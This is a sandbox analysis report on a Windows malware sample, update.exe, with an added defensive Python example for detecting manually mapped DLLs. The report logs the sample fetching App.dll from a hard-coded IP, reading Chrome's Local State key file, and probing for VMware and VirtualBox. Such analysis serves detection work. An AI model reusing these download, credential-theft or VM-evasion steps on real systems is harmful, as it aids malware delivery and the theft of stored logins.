Summary | ZeroBOX

update.exe

Tags: Browser Login Data Stealer, Generic Malware, Malicious Library, Downloader, UPX, Malicious Packer, PE64, PE File, OS Processor Check
Category: FILE
Machine: s1_win7_x6401
Started: July 8, 2024, 9:37 a.m.
Completed: July 8, 2024, 9:48 a.m.
Size 826.0KB
Type PE32+ executable (GUI) x86-64, for MS Windows
MD5 f8ae25eb2bef827759f8cd837ad85bda
SHA256 11cd1472cd1cc75245a148d4e9560bf7f7917443b36dec3f92ed79b8e743b399
CRC32 D4576184
ssdeep 12288:zKgT0C+p1QJteI+ynEWYgeWYg955/155/Z4ML4nvC66aNAl96acG/Eoz1I+MO/uR:zKe0C+p1QJD05vxP2ltpsj+MO/ucu
Yara
  • Malicious_Library_Zero - Malicious_Library
  • PE_Header_Zero - PE File Signature
  • infoStealer_browser_b_Zero - browser info stealer
  • Network_Downloader - File Downloader
  • Malicious_Packer_Zero - Malicious Packer
  • IsPE64 - (no description)
  • UPX_Zero - UPX packed file
  • Generic_Malware_Zero - Generic Malware
  • OS_Processor_Check_Zero - OS Processor Check

Domains (Name | Response | Post-Analysis Lookup)
No domain names were resolved: the download server was contacted directly by IP address (see the "Connection to IP address" signature and the Suricata alerts below).
Hosts (IP Address | Status | Action)
45.140.146.248 | Active | Moloch

Suricata Alerts

Flow | SID | Signature | Category
TCP 192.168.56.101:49161 -> 45.140.146.248:80 | 2027250 | ET INFO Dotted Quad Host DLL Request | Potentially Bad Traffic
TCP 45.140.146.248:80 -> 192.168.56.101:49161 | 2018959 | ET POLICY PE EXE or DLL Windows file download HTTP | Potential Corporate Privacy Violation

Suricata TLS

No Suricata TLS

Time & API Arguments Status Return Repeated

__exception__

stacktrace:
update+0x66570 @ 0x13fea6570
update+0x663f2 @ 0x13fea63f2
update+0x67e15 @ 0x13fea7e15
update+0x70623 @ 0x13feb0623
update+0x6cf9e @ 0x13feacf9e
update+0x41ed6 @ 0x13fe81ed6
BaseThreadInitThunk+0xd CreateThread-0x53 kernel32+0x1652d @ 0x76c2652d
RtlUserThreadStart+0x21 strchr-0x3df ntdll+0x2c521 @ 0x76d5c521

exception.instruction_r: 48 8b 48 20 48 83 ca ff 48 ff c2 44 38 34 11 75
exception.symbol: update+0x66570
exception.instruction: mov rcx, qword ptr [rax + 0x20] (rax is 0 at the time of the fault, see the registers below: a read from address 0x20, i.e. a NULL-pointer dereference)
exception.module: update.exe
exception.exception_code: 0xc0000005 (STATUS_ACCESS_VIOLATION)
exception.offset: 419184 (0x66570)
exception.address: 0x13fea6570 (module base = 0x13fea6570 - 0x66570 = 0x13fe40000)
registers.rax: 0
registers.rbx: 0
registers.rcx: 0
registers.rdx: 5367488400 (0x13fed5f90)
registers.rsi: 0
registers.rdi: 0
registers.rbp: 0
registers.rsp: 2358464 (0x23fcc0)
registers.r8: 4294967288 (0xfffffff8)
registers.r9: 119 (0x77)
registers.r10: 5367488400 (0x13fed5f90)
registers.r11: 2355520 (0x23f140)
registers.r12: 0
registers.r13: 0
registers.r14: 0
registers.r15: 0
Status 1, Return 0, Repeated 0
suspicious_features: Connection to IP address
suspicious_request: GET http://45.140.146.248/App.dll
request: GET http://45.140.146.248/App.dll
file: C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local State (Chrome's Local State JSON holds the DPAPI-protected os_crypt.encrypted_key needed to decrypt saved logins, which is why reading it triggers the browser info stealer signature)
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

process_identifier: 2556
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 741376 (0xB5000, 181 pages)
protection: 32 (PAGE_EXECUTE_READ)
base_address: 0x0000000180001000 (0x180000000 is the default ImageBase of x64 DLLs; +0x1000 is where the first section of a PE32+ image normally starts)
process_handle: 0xffffffffffffffff (pseudo-handle for the current process)
Status 1, Return 0, Repeated 0
Marking a section-sized region at a DLL's default image base executable inside its own process, together with the PE image read off the network below, is consistent with the downloaded App.dll being mapped manually by update.exe rather than loaded through LoadLibrary.
Time & API Arguments Status Return Repeated

InternetReadFile

buffer: MZ ... "This program cannot be run in DOS mode." ... Rich ... PE header with Machine 0x8664 (x86-64), section table .text .rdata .data .pdata .rsrc .reloc [the response body for GET /App.dll is a binary PE image; its raw bytes are not reproduced here]
request_handle: 0x0000000000cc000c
Status 1, Return 1, Repeated 0
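The two records above, an HTTP response whose first bytes are an MZ/PE header and an NtProtectVirtualMemory call that makes 0xB5000 bytes at 0x180001000 executable, are the footprint of a manual-map loader: copy the downloaded image to its preferred ImageBase, then apply each section's protection. The following is an added example, not code from the report or from the sample, that parses a PE32+ header from a captured buffer (such as a sandbox's InternetReadFile capture) and checks whether a protect call lines up with one of the image's executable sections at its preferred base. The sample DLL header it builds is constructed for the example: only the section names and the page-rounded .text length of 0xB5000 mirror the report; every other size, offset and field value is invented.

```python
import struct

# PE constants (from the PE/COFF specification)
IMAGE_DOS_SIGNATURE = 0x5A4D           # "MZ"
IMAGE_NT_SIGNATURE = 0x00004550        # "PE\0\0"
IMAGE_NT_OPTIONAL_HDR64_MAGIC = 0x20B  # PE32+
IMAGE_FILE_MACHINE_AMD64 = 0x8664
IMAGE_FILE_DLL = 0x2000
IMAGE_SCN_MEM_EXECUTE = 0x20000000
EXECUTABLE_PROTECTIONS = {0x10, 0x20, 0x40, 0x80}  # PAGE_EXECUTE* (PAGE_EXECUTE_READ = 0x20)


def parse_pe64(buf):
    """Parse the headers of a PE32+ image from a byte buffer (e.g. a captured download)."""
    if len(buf) < 0x40 or struct.unpack_from("<H", buf, 0)[0] != IMAGE_DOS_SIGNATURE:
        raise ValueError("no MZ header")
    e_lfanew = struct.unpack_from("<I", buf, 0x3C)[0]
    if struct.unpack_from("<I", buf, e_lfanew)[0] != IMAGE_NT_SIGNATURE:
        raise ValueError("no PE signature")
    # IMAGE_FILE_HEADER follows the 4-byte signature; IMAGE_OPTIONAL_HEADER64 follows it
    machine, nsections, _ts, _sym, _nsym, opt_size, characteristics = struct.unpack_from(
        "<HHIIIHH", buf, e_lfanew + 4)
    opt = e_lfanew + 24
    if struct.unpack_from("<H", buf, opt)[0] != IMAGE_NT_OPTIONAL_HDR64_MAGIC:
        raise ValueError("not a PE32+ image")
    image_base = struct.unpack_from("<Q", buf, opt + 24)[0]
    section_alignment = struct.unpack_from("<I", buf, opt + 32)[0]
    size_of_image = struct.unpack_from("<I", buf, opt + 56)[0]
    sections = []
    for i in range(nsections):  # section table starts right after the optional header
        name, vsize, va, rawsize, rawptr, _r, _l, _nr, _nl, flags = struct.unpack_from(
            "<8sIIIIIIHHI", buf, opt + opt_size + 40 * i)
        sections.append({"name": name.rstrip(b"\0").decode(), "virtual_size": vsize,
                         "virtual_address": va, "raw_size": rawsize, "raw_ptr": rawptr,
                         "characteristics": flags})
    return {"machine": machine, "is_dll": bool(characteristics & IMAGE_FILE_DLL),
            "image_base": image_base, "section_alignment": section_alignment,
            "size_of_image": size_of_image, "sections": sections}


def executable_regions(pe, load_base=None):
    """(address, length, name) of each executable section as a loader maps it:
    base + VirtualAddress, length rounded up to SectionAlignment (page granularity)."""
    base = pe["image_base"] if load_base is None else load_base
    align = pe["section_alignment"]
    return [(base + s["virtual_address"], -(-s["virtual_size"] // align) * align, s["name"])
            for s in pe["sections"] if s["characteristics"] & IMAGE_SCN_MEM_EXECUTE]


def explains_protect_call(pe, base_address, length, protection):
    """True if NtProtectVirtualMemory(base_address, length, protection) exactly covers an
    executable section of this image loaded at its preferred ImageBase, i.e. the call looks
    like a manual-map loader applying section protections after copying the image."""
    if protection not in EXECUTABLE_PROTECTIONS:
        return False
    return any(addr == base_address and size == length for addr, size, _ in executable_regions(pe))


def build_sample_dll():
    """Constructed sample (headers only, no section bodies): a PE32+ DLL with the section
    names seen in the captured buffer and a .text section whose page-rounded size is 0xB5000.
    All other sizes, offsets and header fields are invented for this example."""
    e_lfanew = 0x80
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    stub = b"This program cannot be run in DOS mode.\r\n$"
    dos += stub + b"\0" * (e_lfanew - len(dos) - len(stub))
    # (name, VirtualSize, VirtualAddress, SizeOfRawData, PointerToRawData, Characteristics)
    secs = [(b".text",  0xB4F80, 0x01000, 0xB5000, 0x00400, 0x60000020),  # CODE|EXECUTE|READ
            (b".rdata", 0x20000, 0xB6000, 0x20000, 0xB5400, 0x40000040),
            (b".data",  0x08000, 0xD6000, 0x02000, 0xD5400, 0xC0000040),
            (b".pdata", 0x06000, 0xDE000, 0x06000, 0xD7400, 0x40000040),
            (b".rsrc",  0x01000, 0xE4000, 0x00200, 0xDD400, 0x40000040),
            (b".reloc", 0x02000, 0xE5000, 0x02000, 0xDD600, 0x42000040)]
    file_hdr = struct.pack("<HHIIIHH", IMAGE_FILE_MACHINE_AMD64, len(secs), 0, 0, 0, 0xF0,
                           0x2022)  # EXECUTABLE_IMAGE | LARGE_ADDRESS_AWARE | DLL
    opt_hdr = struct.pack("<HBBIIIIIQIIHHHHHHIIIIHHQQQQII",
                          IMAGE_NT_OPTIONAL_HDR64_MAGIC, 14, 0,
                          0xB5000, 0x30000, 0,          # SizeOfCode, SizeOfInitializedData, SizeOfUninitializedData
                          0x1234, 0x1000,               # AddressOfEntryPoint, BaseOfCode
                          0x180000000,                  # ImageBase: the default for x64 DLLs
                          0x1000, 0x200,                # SectionAlignment, FileAlignment
                          6, 0, 0, 0, 6, 0, 0,          # OS/image/subsystem versions, Win32VersionValue
                          0xE7000, 0x400, 0,            # SizeOfImage, SizeOfHeaders, CheckSum
                          2, 0x160,                     # Subsystem, DllCharacteristics
                          0x100000, 0x1000, 0x100000, 0x1000, 0, 16) + b"\0" * 128  # 16 empty data directories
    sec_hdrs = b"".join(struct.pack("<8sIIIIIIHHI", n, vs, va, rs, rp, 0, 0, 0, 0, fl)
                        for n, vs, va, rs, rp, fl in secs)
    return dos + b"PE\0\0" + file_hdr + opt_hdr + sec_hdrs


if __name__ == "__main__":
    pe = parse_pe64(build_sample_dll())
    print("x64 DLL:", pe["machine"] == IMAGE_FILE_MACHINE_AMD64 and pe["is_dll"])
    print("executable regions:", [(hex(a), hex(n), s) for a, n, s in executable_regions(pe)])
    # the values from the NtProtectVirtualMemory record in the report
    print("protect call matches .text:", explains_protect_call(pe, 0x180001000, 741376, 0x20))
```

Against a real capture, feed the bytes returned by InternetReadFile to parse_pe64 and compare the protect calls the sandbox logged against executable_regions; a match at the preferred ImageBase is worth flagging even when the process never calls LoadLibrary, because a manual mapper copies the image itself and only needs the protect calls to run it.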
host: 45.140.146.248
file: UNC\VBoxMiniRdrDN (device name of the VirtualBox shared-folder driver; probing it is a VM-detection check)
registry: HKEY_LOCAL_MACHINE\SOFTWARE\VMware, Inc.\VMware Tools (VMware Tools installation key; querying it is a VM-detection check)
Antivirus results (vendor, detection name)
Bkav W64.AIDetectMalware
Lionic Trojan.Win32.ClipBanker.Z!c
Elastic malicious (high confidence)
Cynet Malicious (score: 99)
Skyhigh BehavesLike.Win64.Dropper.ch
ALYac Gen:Variant.Razy.625064
Cylance Unsafe
VIPRE Gen:Variant.Razy.625064
Sangfor Spyware.Win32.Razy.V21l
K7AntiVirus Spyware ( 005b581b1 )
BitDefender Gen:Variant.Razy.625064
K7GW Spyware ( 005b581b1 )
Cybereason malicious.b2bef8
Arcabit Trojan.Razy.D989A8
Symantec ML.Attribute.HighConfidence
ESET-NOD32 a variant of Win64/Spy.Agent.IX
APEX Malicious
McAfee Artemis!F8AE25EB2BEF
Avast Win64:MalwareX-gen [Trj]
Kaspersky Trojan-Banker.Win32.ClipBanker.abza
MicroWorld-eScan Gen:Variant.Razy.625064
Rising Spyware.Agent!8.C6 (CLOUD)
Emsisoft Gen:Variant.Razy.625064 (B)
F-Secure Trojan.TR/AVI.Agent.vfmnb
McAfeeD ti!11CD1472CD1C
FireEye Generic.mg.f8ae25eb2bef8277
Sophos Mal/Generic-S
Ikarus Trojan.Win64.Spy
Webroot W32.Malware.Gen
Google Detected
Avira TR/AVI.Agent.vfmnb
Gridinsoft Ransom.Win64.Wacatac.sa
Microsoft Trojan:Win32/Wacatac.B!ml
ZoneAlarm Trojan-Banker.Win32.ClipBanker.abza
GData Gen:Variant.Razy.625064
Varist W64/ABTrojan.GEFJ-2601
DeepInstinct MALICIOUS
Malwarebytes Generic.Malware/Suspicious
TrendMicro-HouseCall TROJ_GEN.R002H09G624
MAX malware (ai score=82)
Fortinet W64/Agent.IX!tr.spy
AVG Win64:MalwareX-gen [Trj]
Paloalto generic.ml
CrowdStrike win/malicious_confidence_70% (D)
alibabacloud Trojan[spy]:Win/Razy.Gen